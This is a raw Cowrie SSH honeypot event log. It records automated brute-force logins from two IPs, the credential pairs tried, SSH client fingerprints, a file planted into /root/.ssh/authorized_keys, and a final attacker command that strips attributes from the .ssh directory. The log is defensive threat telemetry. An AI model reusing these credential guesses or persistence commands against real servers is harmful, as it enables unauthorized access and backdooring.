{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:55:44.631877Z","src_ip":"213.6.203.226","session":"18a795544616"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:55:44.632833Z","src_ip":"213.6.203.226","session":"18a795544616"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":51373,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c57ff694345","protocol":"ssh","message":"New connection: 213.6.203.226:51373 (1.2.3.4:22) [session: 0c57ff694345]","sensor":"my-vps","timestamp":"2025-09-09T05:55:44.708961Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:55:44.709966Z","src_ip":"213.6.203.226","session":"0c57ff694345"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:55:44.782479Z","src_ip":"213.6.203.226","session":"0c57ff694345"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:55:45.111897Z","src_ip":"213.6.203.226","session":"0c57ff694345"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51546,"dst_ip":"1.2.3.4","dst_port":22,"session":"f29826631b93","protocol":"ssh","message":"New connection: 212.227.235.229:51546 (1.2.3.4:22) [session: f29826631b93]","sensor":"my-vps","timestamp":"2025-09-09T05:55:45.595578Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:55:45.596347Z","src_ip":"212.227.235.229","session":"f29826631b93"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:55:45.791512Z","src_ip":"212.227.235.229","session":"f29826631b93"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:55:46.185744Z","src_ip":"213.6.203.226","session":"0c57ff694345"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":62935,"dst_ip":"1.2.3.4","dst_port":22,"session":"1351a9ddb86e","protocol":"ssh","message":"New connection: 213.6.203.226:62935 (1.2.3.4:22) [session: 1351a9ddb86e]","sensor":"my-vps","timestamp":"2025-09-09T05:55:46.246948Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:55:46.247684Z","src_ip":"213.6.203.226","session":"1351a9ddb86e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:55:46.314938Z","src_ip":"213.6.203.226","session":"1351a9ddb86e"}
{"eventid":"cowrie.login.failed","username":"clock","password":"clock","message":"login attempt [clock/clock] failed","sensor":"my-vps","timestamp":"2025-09-09T05:55:46.532320Z","src_ip":"212.227.235.229","session":"f29826631b93"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:55:46.626361Z","src_ip":"213.6.203.226","session":"1351a9ddb86e"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:55:46.693885Z","src_ip":"213.6.203.226","session":"18a795544616"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:55:46.695015Z","src_ip":"213.6.203.226","session":"1351a9ddb86e"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:55:47.706142Z","src_ip":"212.227.235.229","session":"f29826631b93"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46548,"dst_ip":"1.2.3.4","dst_port":22,"session":"861ae2806a4d","protocol":"ssh","message":"New connection: 212.227.235.229:46548 (1.2.3.4:22) [session: 861ae2806a4d]","sensor":"my-vps","timestamp":"2025-09-09T05:56:08.284945Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T05:56:08.285863Z","src_ip":"212.227.235.229","session":"861ae2806a4d"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T05:56:08.528645Z","src_ip":"212.227.235.229","session":"861ae2806a4d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51704,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b965fe0d0a3","protocol":"ssh","message":"New connection: 212.227.235.229:51704 (1.2.3.4:22) [session: 7b965fe0d0a3]","sensor":"my-vps","timestamp":"2025-09-09T05:56:09.356490Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:56:09.357133Z","src_ip":"212.227.235.229","session":"7b965fe0d0a3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:56:09.444574Z","src_ip":"212.227.235.229","session":"7b965fe0d0a3"}
{"eventid":"cowrie.login.failed","username":"user1","password":"admin@123","message":"login attempt [user1/admin@123] failed","sensor":"my-vps","timestamp":"2025-09-09T05:56:09.540055Z","src_ip":"212.227.235.229","session":"861ae2806a4d"}
{"eventid":"cowrie.login.failed","username":"mos","password":"1","message":"login attempt [mos/1] failed","sensor":"my-vps","timestamp":"2025-09-09T05:56:09.828243Z","src_ip":"212.227.235.229","session":"7b965fe0d0a3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48484,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a7823dbec52","protocol":"ssh","message":"New connection: 212.227.235.229:48484 (1.2.3.4:22) [session: 6a7823dbec52]","sensor":"my-vps","timestamp":"2025-09-09T05:56:10.234592Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T05:56:10.235178Z","src_ip":"212.227.235.229","session":"6a7823dbec52"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T05:56:10.411054Z","src_ip":"212.227.235.229","session":"6a7823dbec52"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:56:10.784510Z","src_ip":"212.227.235.229","session":"861ae2806a4d"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:56:10.914871Z","src_ip":"212.227.235.229","session":"7b965fe0d0a3"}
{"eventid":"cowrie.login.failed","username":"support","password":"pass","message":"login attempt [support/pass] failed","sensor":"my-vps","timestamp":"2025-09-09T05:56:11.135822Z","src_ip":"212.227.235.229","session":"6a7823dbec52"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:56:12.314930Z","src_ip":"212.227.235.229","session":"6a7823dbec52"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40578,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e565b1b8c46","protocol":"ssh","message":"New connection: 212.227.235.229:40578 (1.2.3.4:22) [session: 2e565b1b8c46]","sensor":"my-vps","timestamp":"2025-09-09T05:56:25.391784Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:56:25.393390Z","src_ip":"212.227.235.229","session":"2e565b1b8c46"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:56:25.471087Z","src_ip":"212.227.235.229","session":"2e565b1b8c46"}
{"eventid":"cowrie.login.failed","username":"debian","password":"password123","message":"login attempt [debian/password123] failed","sensor":"my-vps","timestamp":"2025-09-09T05:56:25.784899Z","src_ip":"212.227.235.229","session":"2e565b1b8c46"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:56:26.865579Z","src_ip":"212.227.235.229","session":"2e565b1b8c46"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":64135,"dst_ip":"1.2.3.4","dst_port":22,"session":"9d1e007ce7dd","protocol":"ssh","message":"New connection: 212.227.235.229:64135 (1.2.3.4:22) [session: 9d1e007ce7dd]","sensor":"my-vps","timestamp":"2025-09-09T05:56:28.147706Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:56:28.148663Z","src_ip":"212.227.235.229","session":"9d1e007ce7dd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:56:28.296637Z","src_ip":"212.227.235.229","session":"9d1e007ce7dd"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"123456789","message":"login attempt [tomcat/123456789] failed","sensor":"my-vps","timestamp":"2025-09-09T05:56:28.891890Z","src_ip":"212.227.235.229","session":"9d1e007ce7dd"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:56:30.028024Z","src_ip":"212.227.235.229","session":"9d1e007ce7dd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45598,"dst_ip":"1.2.3.4","dst_port":22,"session":"c5cb645a947d","protocol":"ssh","message":"New connection: 212.227.235.229:45598 (1.2.3.4:22) [session: c5cb645a947d]","sensor":"my-vps","timestamp":"2025-09-09T05:56:50.614421Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:56:50.615457Z","src_ip":"212.227.235.229","session":"c5cb645a947d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:56:50.790537Z","src_ip":"212.227.235.229","session":"c5cb645a947d"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"123456789","message":"login attempt [tomcat/123456789] failed","sensor":"my-vps","timestamp":"2025-09-09T05:56:51.753056Z","src_ip":"212.227.235.229","session":"c5cb645a947d"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":41701,"dst_ip":"1.2.3.4","dst_port":22,"session":"75725d33937e","protocol":"ssh","message":"New connection: 213.6.203.226:41701 (1.2.3.4:22) [session: 75725d33937e]","sensor":"my-vps","timestamp":"2025-09-09T05:56:51.937038Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:56:51.938300Z","src_ip":"213.6.203.226","session":"75725d33937e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:56:52.005729Z","src_ip":"213.6.203.226","session":"75725d33937e"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwaszx","message":"login attempt [root/Qwaszx] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:56:52.307240Z","src_ip":"213.6.203.226","session":"75725d33937e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:56:52.490242Z","src_ip":"213.6.203.226","session":"75725d33937e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:56:52.490968Z","src_ip":"213.6.203.226","session":"75725d33937e"}
